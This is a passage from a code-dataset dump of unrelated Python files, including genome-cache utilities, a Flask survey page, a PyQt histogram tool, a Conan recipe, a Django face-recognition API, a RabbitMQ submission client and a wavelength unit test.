self._stderr\n\n\ndef prep_filelock(lock_file, max_age=10):\n \"\"\"\n create the directory for the lock_file if needed\n and remove locks older than the max_age (in seconds)\n \"\"\"\n os.makedirs(os.path.dirname(lock_file), exist_ok=True)\n\n # sometimes two jobs start in parallel and try to delete at the same time\n try:\n # ignore locks that are older than the max_age\n if os.path.exists(lock_file) and \\\n time.time() - os.stat(lock_file).st_mtime > max_age:\n os.unlink(lock_file)\n except FileNotFoundError:\n pass\n\n\ndef retry_pickling(func):\n def wrap(*args, **kwargs):\n # we get two tries, in case parallel executions are interfering with one another\n for _ in range(2):\n try:\n return func(*args, **kwargs)\n except FileNotFoundError:\n time.sleep(1)\n else:\n logger.error(\"There were some problems with locking the seq2science cache. Please try again in a bit.\")\n raise TerminatedException\n return wrap\n\n\nclass PickleDict(dict):\n \"\"\"dict with builtin pickling utility\"\"\"\n def __init__(self, file):\n self.file = file\n self.filelock = f\"{file}.p.lock\"\n\n data = self.load() if os.path.exists(self.file) else dict()\n super(PickleDict, self).__init__(data)\n\n @retry_pickling\n def load(self):\n prep_filelock(self.filelock, 30)\n with FileLock(self.filelock):\n return pickle.load(open(self.file, \"rb\"))\n\n @retry_pickling\n def save(self):\n prep_filelock(self.filelock, 30)\n with FileLock(self.filelock):\n pickle.dump(self, open(self.file, \"wb\"))\n\n def search(self, search_assemblies: list):\n \"\"\"\n Check the genomepy database for a provider stat serves both genome and annotation for an assembly.\n If impossible, settle with the first provider that serves the genome.\n \"\"\"\n logger.info(\"Determining assembly providers\")\n for assembly in search_assemblies:\n if assembly not in self:\n self[assembly] = {\"genome\": None, \"annotation\": None}\n\n with open(logger.logfile, 'w') as log:\n with contextlib.redirect_stdout(log), contextlib.redirect_stderr(log):\n genomepy.logger.remove()\n genomepy.logger.add(\n log,\n format=\"{time:HH:mm:ss} | {level} | {message}\",\n level=\"INFO\",\n )\n for p in genomepy.providers.online_providers():\n search_assemblies = [a for a in search_assemblies if self[a][\"annotation\"] is None]\n for assembly in search_assemblies:\n if assembly not in p.genomes:\n continue # check again next provider\n\n if p.annotation_links(assembly):\n self[assembly][\"genome\"] = p.name\n self[assembly][\"annotation\"] = p.name\n\n elif self[assembly][\"genome\"] is None:\n self[assembly][\"genome\"] = p.name\n\n if all(self[a][\"annotation\"] for a in search_assemblies):\n break # don't load the next provider\n\n # store added assemblies\n self.save()\n\n def check(self, assemblies: list, annotation_required: bool, verbose: bool):\n \"\"\"\n Check if the genome (and the annotation if required) can be downloaded for each specified assembly.\n \"\"\"\n for assembly in assemblies:\n if self[assembly][\"genome\"] is None:\n logger.warning(\n f\"Could not download assembly {assembly}.\\n\"\n f\"Find alternative assemblies with `genomepy search {assembly}`\"\n )\n exit(1)\n\n if self[assembly][\"annotation\"] is None:\n if verbose:\n logger.warning(\n f\"No annotation for assembly {assembly} can be downloaded. Another provider (and \"\n f\"thus another assembly name) might have a gene annotation.\\n\"\n f\"Find alternative assemblies with `genomepy search {assembly}`\\n\"\n )\n if annotation_required:\n exit(1)\n\n\ndef is_local(assembly: str, ftype: str, config: dict) -> bool:\n \"\"\"checks if genomic file(s) are present locally\"\"\"\n file = os.path.join(config['genome_dir'], assembly, assembly)\n local_fasta = os.path.exists(f\"{file}.fa\")\n local_gtf = os.path.exists(f\"{file}.annotation.gtf\")\n local_bed = os.path.exists(f\"{file}.annotation.bed\")\n if ftype == \"genome\":\n return local_fasta\n if ftype == \"annotation\":\n # check genome and annotations, as genome is always needed\n return local_gtf and local_bed and local_fasta\n","sub_path":"seq2science/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":24544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"643972983","text":"from flask import Flask, redirect, render_template, request, url_for\nfrom server import app\n\nimport sqlite3\n\n@app.route(\"/home\", methods=[\"GET\", \"POST\"])\ndef home():\n\treturn render_template(\"home.html\")\n\n@app.route(\"/response_page\", methods=[\"GET\", \"POST\"])\ndef response():\n\n\n\t\ts = []\n\t\n\t\tstrongagree = 0\n\t\tstrongdisagree = 0\n\t\tyes = 0\n\t\tno = 0\t\n\t\t\n\t\tconn = sqlite3.connect('survey_pool.db')\n\t\tcur = conn.cursor()\n\t\n\t\tcourse = cur.execute(\"SELECT * FROM Gordon_Survey_Response\")\n\t\n\t\tpool = cur.fetchall()\n\n\t\ti = 1\t\t\n\t\tfor i in range(1,len(pool[0])):\n\t\t\tresult = []\n\t\t\tx = i\n\t\t\tresult.append(x)\n\t\t\tif pool[0][i] in range(1,5):\n\t\t\t\tx = 'Level question'\n\n\t\t\telif pool[0][i] in range(5,7):\n\t\t\t\tx = 'Yes or No question'\n\n\t\t\telse:\n\t\t\t\tx = 'Text'\n\n\t\t\tresult.append(x)\n\n\t\t\tresult.append(0)\n\t\t\tresult.append(0)\n\t\t\tresult.append(0)\n\t\t\tresult.append(0)\n\t\t\t\n\t\t\tprint (result)\n\t\t\ts.append(result)\n\t\t#print (s)\n\t\tfor res in pool:\n\t\t\ta = 1\n\t\t\twhile a < len(res):\n\t\t\t\tif res[a] not in range(1,7):\n\t\t\t\t\tpass\n\t\t\t\telif res[a] <= 2:\n\t\t\t\t\ts[a-1][2] += 1\n\n\t\t\t\telif res[a] <= 4:\n\t\t\t\t\ts[a-1][3] += 1\n\n\t\t\t\telif res[a] == 5:\n\t\t\t\t\ts[a-1][4] += 1\n\n\t\t\t\telse:\n\t\t\t\t\ts[a-1][5] += 1\t\t\t\t\t\t\n\n\t\t\t\ta += 1\n\t\t#print(s)\n\n\t\t\n\t\treturn render_template(\"response_page.html\",results = s)\n\n\n\n\n\n","sub_path":"templates/student/random/test/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"424104082","text":"class union:\n def __init__(self):\n self.level ={'ui': 'union_individual',\\\n 'ue': 'union_ecosystem'}\n self.group = {'a': 'archaea', \\\n 'b': 'bacteria', \\\n 'ap':'archaea_parsed', \\\n 'bp':'bacteria_parsed', \\\n 'e': 'eukarya', \\\n 'j': 'JGI', \\\n 'all': 'all', \\\n 'allp': 'all_parsed'}\n self.number_of_species = {'union_individual_archaea':188, \\\n 'union_individual_bacteria':183, \\\n 'union_individual_archaea_parsed':105, \\\n 'union_individual_bacteria_parsed':154,\\\n 'union_individual_eukarya':58, \\\n 'union_individual_all': 383,\\\n 'union_individual_all_parsed': 291, \\\n 'union_ecosystem_JGI':309}\n self.lines_in_topo_ave = {'union_individual_archaea':2, \\\n 'union_individual_bacteria':2, \\\n 'union_individual_archaea_parsed':2, \\\n 'union_individual_bacteria_parsed':2,\\\n 'union_individual_eukarya':2, \\\n 'union_individual_all': 2,\\\n 'union_individual_all_parsed': 2, \\\n 'union_ecosystem_JGI':2}\n\n def species_name(self, system_name, species):\n species_name = system_name + '-upto-%d'%(species)\n return species_name\n\n def number_of_rxn(self, system_name, species):\n inputfile = open('../data/union/rxn_lists/rxn_%s.dat'%(system_name), 'r')\n inputfile.readline() #header\n nbr_rxn = 0\n for line in inputfile:\n items = line.rstrip().split('\\t')\n label = int(items[0])\n nbr_rxn += 1\n if label > species:\n break\n inputfile.close()\n return nbr_rxn\n\n def load_list_rxn(self, system_name, species):\n rxn_list = []\n inputfile = open('../data/union/rxn_lists/rxn_%s.dat'%(system_name), 'r')\n inputfile.readline()\n for line in inputfile:\n items = line.rstrip().split('\\t')\n label = int(items[0])\n if label > species:\n break\n rxn = items[1]\n rxn_list.append(rxn)\n inputfile.close()\n return rxn_list\n\n def sub_edges(self, system_name, species):\n import kegg_nets as kg\n kegg = kg.kegg()\n edge_list = []\n rxn_list = self.load_list_rxn(system_name, species)\n for x in rxn_list:\n for r in kegg.rxn_reac[x]:\n for p in kegg.rxn_prod[x]:\n if r == p: ### remove self-loops from sub-sub nets\n continue\n edge_list.append((r, p))\n return edge_list\n\n def rxn_edges(self, system_name, species):\n import kegg_nets as kg\n kegg = kg.kegg()\n edge_list = []\n rxn_list = self.load_list_rxn(system_name, species)\n for x in rxn_list:\n for r in kegg.rxn_reac[x]:\n edge_list.append((r, x))\n for p in kegg.rxn_prod[x]:\n edge_list.append((x, p))\n return edge_list\n\n def rxn_degree(self, system_name, species):\n import kegg_nets as kg\n kegg = kg.kegg()\n rxn_list = self.load_list_rxn(system_name, species)\n sub_set = set()\n dict_sub_nbrRxn = {}\n for x in rxn_list:\n for r in kegg.rxn_reac[x]:\n if r not in sub_set:\n dict_sub_nbrRxn[r] = 0\n dict_sub_nbrRxn[r] += 1\n sub_set.add(r)\n else:\n dict_sub_nbrRxn[r] += 1\n for p in kegg.rxn_prod[x]:\n if p not in sub_set:\n dict_sub_nbrRxn[p] = 0\n dict_sub_nbrRxn[p] += 1\n sub_set.add(p)\n else:\n dict_sub_nbrRxn[p] += 1\n return dict_sub_nbrRxn\n","sub_path":"code/mgmnet/union_nets.py","file_name":"union_nets.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"173492736","text":"from macropy.core.macros import *\nfrom macropy.dump import macros, dump, dumpid\nfrom macropy.core.quotes import macros, q, u\nimport pprint\npp = pprint.PrettyPrinter(indent = 4\n)\n_ = None # makes IDE happy\n\nmacros = Macros()\n\n@macros.expr\ndef f(tree, gen_sym, **kw):\n\n\n @Walker\n def underscore_search(tree, collect, **kw):\n if isinstance(tree, Name) and tree.id == \"_\":\n name = gen_sym()\n tree.id = name\n collect(name)\n return tree\n\n tree, used_names = underscore_search.recurse_collect(tree)\n\n new_tree = q[lambda: ast[tree]]\n new_tree.args.args = [Name(id = x) for x in used_names]\n\n dumpid[tree]\n dumpid[real_repr(tree)]\n dumpid[tree]\n\n dumpid[new_tree]\n dumpid[real_repr(new_tree)]\n dumpid[unparse(new_tree)]\n\n return new_tree\n","sub_path":"docs/examples/hygiene/gen_sym/macro_module.py","file_name":"macro_module.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"263906309","text":"from PyQt5 import QtWidgets\nfrom ui.histogram_viewer import HistogramViewer\nfrom core.histogram import histogram_match\n\n\nclass CentralWidget(QtWidgets.QWidget):\n \"\"\"docstring for CentralWidget\"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.__createGroups()\n\n def __createGroups(self):\n self.inputHistogram = HistogramViewer(self)\n self.targetHistogram = HistogramViewer(self)\n self.outputHistogram = HistogramViewer(self)\n layout = QtWidgets.QHBoxLayout(self)\n\n inputGroup = QtWidgets.QGroupBox(self, title=\"Input\")\n inputLayout = QtWidgets.QVBoxLayout(inputGroup)\n inputLayout.addWidget(self.inputHistogram)\n\n targetGroup = QtWidgets.QGroupBox(self, title=\"Target\")\n targetLayout = QtWidgets.QVBoxLayout(targetGroup)\n targetLayout.addWidget(self.targetHistogram)\n\n outputGroup = QtWidgets.QGroupBox(self, title=\"Output\")\n outputLayout = QtWidgets.QVBoxLayout(outputGroup)\n outputLayout.addWidget(self.outputHistogram)\n\n layout.addWidget(inputGroup, stretch=1)\n layout.addWidget(targetGroup, stretch=1)\n layout.addWidget(outputGroup, stretch=1)\n\n def openInput(self):\n filename = self.__openImage(title=\"Open Input Image\")\n if len(filename) == 0:\n return\n self.inputHistogram.loadImage(filename)\n\n def openTarget(self):\n filename = self.__openImage(title=\"Open Target Image\")\n if len(filename) == 0:\n return\n self.targetHistogram.loadImage(filename)\n\n def equalize(self):\n inputData = self.inputHistogram.getImageData()\n targetData = self.targetHistogram.getImageData()\n if len(inputData) == 0 or len(targetData) == 0:\n msgBox = QtWidgets.QMessageBox()\n msgBox.setText(\"Please open both images first\")\n msgBox.exec()\n return\n\n data = histogram_match(inputData, targetData)\n height, width, channel = inputData.shape\n bpl = 3 * width\n self.outputHistogram.setImageData(data, width, height, bpl)\n\n def __openImage(self, title=\"\"):\n filename, _ = QtWidgets.QFileDialog.getOpenFileName(self, title, \"\", \"Image Files (*.png *.jpg *.jpeg)\")\n return filename\n","sub_path":"ui/central_widget.py","file_name":"central_widget.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"513003954","text":"#!/usr/bin/python3\nimport signal, os, time\n\ndef handler(signum, frame):\n global signals,duration,triggercount\n now = time.time()\n newsignals = []\n for sig in signals:\n if (sig > now - duration):\n newsignals.append(sig)\n\n signals = newsignals\n signals.append(now)\n\n# print(\"Received signal\")\n\n if len(signals) == triggercount:\n os.system(\"/usr/local/bin/wakemarge.sh\")\n signals=[]\n\n\nsignals=[]\nduration = 2\ntriggercount = 3\n\nsignal.signal(signal.SIGUSR1, handler)\n\nwhile True:\n#\tprint('About to wait')\n\tsignal.pause()\n#\tprint('Continuing after signal')\n","sub_path":"pitunes/lirc/usr/local/bin/remoted.py","file_name":"remoted.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"397807493","text":"\"\"\" 学生端机器程序\n\n@Author: Jintu Zheng\n@Date: 2020-12-28\n\n该进程:最多能同时提交 份代码,每一份代码提交之后将\n发送到消息队列里面,然后该线程等待一段时间之后从持久层的缓存服务器里面查询属于自己的评判结果\n(用web访问持久层缓存服务器的一条缓存查询线程)\n然后该提交线程才算结束。\n\n提交一份代码之后我们并不阻止他继续提交多份代码,即便第一份代码没有评判完,在前端是没有感觉拥塞的\n他依旧可以提交第二份,但是为了安全起见,我设置了来控制最多能提交的代码份数\n\n只有当我们的提交线程从缓存服务器里面查询到自己的提交结果之后,提交线程才算真正结束\n\"\"\"\n\nfrom pika import PlainCredentials, BlockingConnection, ConnectionParameters\nimport json\nimport random\nimport threading\nimport time\nfrom utils import current_datetime, gen_task_ID, getFiles\nfrom queue import Queue\nimport requests\nimport json\n\nMQ_USER_NAME = 'guest' #MQ的用户名\nMQ_USER_PASSWORD = 'guest' #MQ的密码\nHOST_NAME = 'localhost' #MQ的网络地址\nHOST_PORT = 5672 # MQ的端口\nCACHE_PORT = 1234 # 持久化缓存的端口 \n\nThreads_limit = 4 # 该学生的机器单一进程能一次性最多提交4份代码\ncredentials = PlainCredentials(MQ_USER_NAME, MQ_USER_PASSWORD) # MQ的用户名和密码,创建凭证\n\ndef send_msg_to_MQ(msg_data): # Build connection -> build channel -> send message\n #建立连接,然后发起通道,然后再发送信息\n connection = BlockingConnection(ConnectionParameters(host = HOST_NAME, port = HOST_PORT, virtual_host = '/',credentials = credentials))\n channel = connection.channel()\n result = channel.queue_declare(queue = 'un_judged') # 声明消息队列,消息将在这个队列传递,如不存在,则创建\n \"\"\"\n data:\n msg_data;\n @key='TaskID' value->str # 自动生成唯一的任务ID (自动生成)\n @key='studentNumber' value->str # 学号\n @key='code' value->str # 需要评判的代码\n @key='time' value->str # 当前的时间 (自动生成)\n \"\"\"\n TID = gen_task_ID(msg_data['studentNumber'])\n message = json.dumps({'TaskID':TID,'code':msg_data['code'],'time':current_datetime(),'studentNumber':msg_data['studentNumber']}) # build msg\n channel.basic_publish(exchange = '',routing_key = 'un_judged',body = message) # 向队列插入数值 routing_key是队列名\n connection.close()\n return TID\n\n\ndef get_student_code()->str:\n # 发生IO过程\n fl = getFiles('student_codes')\n random_ID = random.randint(0,(len(fl)-1)) #随机选取一个代码文件进行读取\n with open(fl[random_ID], 'r', encoding='utf-8') as f:\n code_content = f.read() # 读取该代码文件\n return code_content\n\n\n#用request post访问持久化缓存服务器\ndef call_check_from_cache(TID):\n try:\n request_url = \"http://\"+HOST_NAME+\":\"+str(CACHE_PORT)\n headers = {'content-type': 'application/x-www-form-urlencoded'}\n response = requests.post(request_url, data={'tid':TID}, headers=headers)\n if response:\n pack = response.content\n result = json.loads(pack)\n return result # 从缓存服务器里面找到的评判结果\n except Exception as e:\n print(e) #意外打印\n return None\n return None\n\n\n# 提交代码的线程和接收评判结果的线程是配套的\n# 用来提交代码的线程\nclass Summit(threading.Thread):\n def __init__(self):\n super(Summit, self).__init__()\n \n def run(self):\n studentNUmber = str(random.uniform(000000,999999)) #产生随机的学号\n code = get_student_code()\n msg = {}\n msg['studentNumber'] = studentNUmber\n msg['code'] = code\n print(msg)\n TID = send_msg_to_MQ(msg)\n # Student refresh 这里相当于学生在客户端刷新自己的评判结果\n # 这里从缓存服务器轮询直到收到结果(这里每一次轮询之前就手动线程暂停一段时间)\n while(True):\n result = call_check_from_cache(TID) # 从持久层缓存服务器里面查询结果,没有则进入线程等待\n print('学生线程任务:{}正在轮询缓存服务器并等待回应评判结果'.format(TID))\n if result!=None: # 假如我们得到结果了\n print(result)\n break\n \n\nif __name__ == \"__main__\":\n #该学生机子产生代码并提交并异步查询代码的评判结果\n codes_summit_threads = []\n for i in range(Threads_limit):\n summit = Summit()\n summit.start()\n codes_summit_threads.append(summit)\n \n for t in codes_summit_threads:\n t.join()\n ","sub_path":"student_machine.py","file_name":"student_machine.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"186940469","text":"import ClassNLOper_C2\nimport ClassToRepr\nimport numpy as np\n\nclass ClassHyperH():\n def __init__(self,X):\n self.X=X\n self.H=ClassNLOper_C2.H(X)\n if self.X.FilterOrder!=None:\n self.Repr=ClassToRepr.ClassToRepr(X)\n\n\n self.RandomMapRepr=None\n\n def HR(self,xi,it0,it1,ToRepr=True,ToVec=True,Noise=None,Zero=False,CorrectJ=False):\n DicoData=self.H(xi,it0,it1,Noise=Noise,Zero=Zero,CorrectJ=CorrectJ)\n\n # DicoData=self.DoubleBuffer(DicoData)\n if ToRepr:\n DataRepr=self.Repr(DicoData,ToVec=ToVec)\n else:\n DataRepr=DicoData[\"data\"]\n\n if self.RandomMapRepr!=None:\n DataRepr=DataRepr[self.RandomMapRepr]\n\n return DataRepr\n\n def R(self,Data,ToVec=True):\n DataRepr=self.Repr(Data,ToVec=ToVec)\n if self.RandomMapRepr!=None:\n DataRepr=DataRepr[self.RandomMapRepr]\n return DataRepr\n\n def setPSFMode(self,PSFMode=False):\n ListDicoRepr=self.Repr.ListDicoRepr\n for DicoRepr in ListDicoRepr:\n if DicoRepr['Type']=='Image':\n DicoRepr[\"Oper\"].Imager.DoPSF=PSFMode\n\n\n def DoubleBuffer(self,DicoData):\n\n uvw=DicoData[\"uvw\"]\n data=DicoData[\"data\"]\n A0Vec,A1Vec=DicoData[\"A0A1\"]\n flags=DicoData[\"flags\"]\n \n uvw=np.concatenate((uvw,-uvw))\n data=np.concatenate((data,data.conj()))\n A0Vec1=np.concatenate((A0Vec,A1Vec))\n A1Vec1=np.concatenate((A1Vec,A0Vec))\n A0Vec=A0Vec1\n A1Vec=A1Vec1\n flags=np.concatenate((flags,flags))\n \n DicoData[\"uvw\"]=uvw\n DicoData[\"data\"]=data\n DicoData[\"flags\"]=flags\n DicoData[\"A0A1\"]=A0Vec,A1Vec\n DicoData[\"nbl\"]=2*DicoData[\"nbl\"]\n return DicoData\n","sub_path":"HyperCal/PredictDir/ClassHyperH.py","file_name":"ClassHyperH.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"158823214","text":"import os\nimport shutil\n\nfrom conans import ConanFile, tools\n\n\nclass tinyxml(ConanFile):\n name = 'tinyxml'\n version = '1.0.1'\n url = 'https://github.com/wsbu/conan-packages'\n homepage = 'http://www.grinninglizard.com/tinyxml/'\n description = 'TinyXML is a simple, small, C++ XML parser that can be easily integrating into other programs.'\n settings = 'os', 'compiler', 'build_type', 'arch', 'platform'\n license = 'See license file'\n\n scm = {\n 'type': 'git',\n 'url': 'git@bitbucket.org:redlionstl/tinyxml.git',\n 'revision': '82e488fd7e9016170cc222f4a1b85dc57fdd29a0'\n }\n\n def build(self):\n extra_env_vars = {\n 'BUILD_TARGET': str(self.settings.platform),\n 'GPP': tools.get_env('CXX', 'g++')\n }\n with tools.environment_append(extra_env_vars):\n self.run('make --jobs ' + str(tools.cpu_count()))\n\n def package(self):\n lib_name = 'libtinyxml.so.' + self.version\n self.copy(lib_name, dst=os.path.join('usr', 'lib'))\n os.symlink(lib_name, os.path.join(self.package_folder, 'usr', 'lib', 'libtinyxml.so.1'))\n os.symlink(lib_name, os.path.join(self.package_folder, 'usr', 'lib', 'libtinyxml.so'))\n\n self.copy('*.h', dst=os.path.join('usr', 'include'))\n\n src_license = os.path.join(self.source_folder, 'COPYING')\n license_folder = os.path.join(self.package_folder, 'etc', 'license')\n dst_license = os.path.join(license_folder, self.name)\n os.makedirs(license_folder)\n shutil.copy2(src_license, dst_license)\n\n def package_info(self):\n self.cpp_info.libdirs = [os.path.join('usr', 'lib')]\n self.cpp_info.includedirs = [os.path.join('usr', 'include')]\n self.cpp_info.libs = ['tinyxml']\n","sub_path":"tinyxml/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"501004529","text":"import face_recognition, os, cv2\nfrom rest_framework import status\nfrom django.conf import settings\nfrom rest_framework.response import Response\nfrom rest_framework.generics import ListCreateAPIView\nfrom .models import Candidateface\nfrom .permissions import IsAuthenticated\nfrom .serializers import FacerecognitionSerializer,CandidatefaceSerializer\nfrom .pagination import CustomPagination\n\nclass get_post_candidate(ListCreateAPIView):\n serializer_class = CandidatefaceSerializer\n permission_classes = (IsAuthenticated,)\n pagination_class = CustomPagination\n \n def get_queryset(self):\n candidate = Candidateface.objects.all()\n return candidate\n\n # Get all candidates\n def get(self, request):\n candidates = self.get_queryset()\n paginate_queryset = self.paginate_queryset(candidates)\n serializer = self.serializer_class(paginate_queryset, many=True)\n return self.get_paginated_response(serializer.data)\n\n # Create a new entry\n def post(self, request):\n serializer = CandidatefaceSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass post_recognise(ListCreateAPIView):\n permission_classes = (IsAuthenticated,)\n pagination_class = CustomPagination\n\n def get_queryset(self):\n candidate = Candidateface.objects.all()\n return candidate\n\n # Check the image and tell the name\n def post(self, request):\n\n file_serializer = FacerecognitionSerializer(data=request.data)\n\n if file_serializer.is_valid():\n file_serializer.save()\n candidate_list = Candidateface.objects.filter()\n unknown_face = face_recognition.load_image_file(file_serializer.data['Check_Img'])\n try:\n candidateEncodedImages = list()\n known_faces_name = list()\n known_faces_email = list()\n for i in candidate_list:\n candidateEncodedImages.append(\n face_recognition.face_encodings(face_recognition.load_image_file(i.Cand_Img))[0])\n known_faces_name.append(i.name)\n known_faces_email.append(i.email)\n unknown_face_encoding = face_recognition.face_encodings(unknown_face)[0]\n results = face_recognition.compare_faces(candidateEncodedImages, unknown_face_encoding)\n k = 0\n flag = 0;\n for i in results:\n if (i == True):\n res = {'code': '1',\n 'message': 'Recognised',\n 'name':known_faces_name[k],\n 'email':known_faces_email[k]}\n flag = 1;\n k = k + 1\n if (flag == 0):\n res = {'code':'0',\n 'message':'Hey who is this!!'}\n BASE_DIR = settings.BASE_DIR\n os.remove(os.path.join(BASE_DIR, file_serializer.data['Check_Img']))\n except IndexError:\n res = {'code':'0',\n 'message':'Face is not identified in pic'}\n return Response(res, status=status.HTTP_200_OK)\n else:\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n\nclass post_countface(ListCreateAPIView):\n permission_classes = (IsAuthenticated,)\n pagination_class = CustomPagination\n\n def get_queryset(self):\n candidate = Candidateface.objects.all()\n return candidate\n\n # Create a new entry\n def post(self, request):\n\n file_serializer = FacerecognitionSerializer(data=request.data)\n\n if file_serializer.is_valid():\n file_serializer.save()\n\n try:\n image = face_recognition.load_image_file(file_serializer.data['Check_Img'])\n face_locations = face_recognition.face_locations(image, 2)\n res = {'code':'0',\n 'message':'Counted',\n 'facecount':len(face_locations)}\n\n except IndexError:\n res = {'code':'0',\n 'message':'Image quality is too poor to read..'}\n\n BASE_DIR = settings.BASE_DIR\n os.remove(os.path.join(BASE_DIR, file_serializer.data['Check_Img']))\n return Response(res, status=status.HTTP_200_OK)\n else:\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n\nclass post_checklogo(ListCreateAPIView):\n permission_classes = (IsAuthenticated,)\n pagination_class = CustomPagination\n\n def get_queryset(self):\n candidate = Candidateface.objects.all()\n return candidate\n\n # Create a new entry\n def post(self, request):\n\n file_serializer = FacerecognitionSerializer(data=request.data)\n\n if file_serializer.is_valid():\n file_serializer.save()\n try:\n img = cv2.imread(file_serializer.data['Check_Img'])\n img2 = img[:, :, 2]\n img2 = img2 - cv2.erode(img2, None)\n template = cv2.imread('temp1.jpg')[:, :, 2]\n template = template - cv2.erode(template, None)\n ccnorm = cv2.matchTemplate(img2, template, cv2.TM_CCORR_NORMED)\n fval = \"{:.2f}\".format(ccnorm.max())\n if (float(fval) > 0.90):\n res = {'code':'1',\n 'message':'Found Similar pattern.'}\n else:\n res = {'code':'0',\n 'message':'Pattern Was not found..'}\n except IndexError:\n res = {'code':'0',\n 'message':'Image quality is too poor to read..'}\n\n BASE_DIR = settings.BASE_DIR\n os.remove(os.path.join(BASE_DIR, file_serializer.data['Check_Img']))\n return Response(res, status=status.HTTP_200_OK)\n else:\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)","sub_path":"facerecognition/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"346592183","text":"from distutils.core import setup\nfrom Cython.Build import cythonize\nfrom distutils.extension import Extension\nimport numpy\n\nsourcefiles = ['mean_shift_wrapper.pyx', 'mean_shift.cpp']\ncompile_opts = ['-fopenmp','-std=c++11']\next=[Extension('*',\n sourcefiles,\n libraries = ['gomp'],\n include_dirs=[numpy.get_include()],\n extra_compile_args=compile_opts,\n language='c++')]\n\nsetup(\n ext_modules=cythonize(ext)\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"462980678","text":"\"\"\"tabla usuarios\n\nRevision ID: 7399e3cc6a76\nRevises: \nCreate Date: 2021-05-31 16:41:51.985307\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '7399e3cc6a76'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('name', sa.String(length=120), nullable=True),\n sa.Column('apellido_paterno', sa.String(length=120), nullable=True),\n sa.Column('apellido_materno', sa.String(length=120), nullable=True),\n sa.Column('matricula', sa.String(length=10), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_apellido_paterno'), 'user', ['apellido_paterno'], unique=False)\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_matricula'), 'user', ['matricula'], unique=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_user_matricula'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_index(op.f('ix_user_apellido_paterno'), table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n","sub_path":"calif/calificaciones-master/migrations/versions/7399e3cc6a76_tabla_usuarios.py","file_name":"7399e3cc6a76_tabla_usuarios.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"453270644","text":"import unittest\nimport os\nimport numpy as np\nfrom neutronbraggedge.experiment_handler.lambda_wavelength import LambdaWavelength\n\n\nclass TofTest(unittest.TestCase):\n\n def setUp(self):\n _file_path = os.path.dirname(__file__)\n self.data_path = os.path.abspath(os.path.join(_file_path, '../../data'))\n\n def test_loading_manual_lambda_array(self):\n \"\"\"Assert in LambdaWavelength - manual loading of array\"\"\"\n _lambda_array = [1., 2., 3., 4., 5., 6., 7., 8., 9.]\n _lambda_handler = LambdaWavelength(data = _lambda_array)\n self.assertTrue(all(_lambda_array == _lambda_handler.lambda_array))\n\n def test_loading_normal_array_data(self):\n \"\"\"Assert in LambdaWavelength - loading of np.array array\"\"\"\n _lambda_array = np.array([1, 2., 3., 4.])\n _lambda_handler = LambdaWavelength(data = _lambda_array)\n self.assertTrue(all(_lambda_array == _lambda_handler.lambda_array))\n\n def test_not_lambda_array_provided(self):\n \"\"\"Assert in LambdaWavelength - no lambda array provided\"\"\"\n self.assertRaises(ValueError, LambdaWavelength)\n\n def test_loading_auto_lambda_array(self):\n \"\"\"Assert in LambdaWavelength - auto loading of array\"\"\"\n _lambda_filename = os.path.join(self.data_path, 'lambda.txt')\n _lambda_handler = LambdaWavelength(filename = _lambda_filename)\n _lambda_expected = np.array([1.10664703784e-09, 1.10916473754e-09, 1.11168243725e-09,\n 1.11420013696e-09, 1.11671783666e-09, 1.11923553637e-09,\n 1.12175323607e-09, 1.12427093578e-09, 1.12678863549e-09,\n 1.12930633519e-09, 1.1318240349e-09, 1.1343417346e-09,\n 1.13685943431e-09, 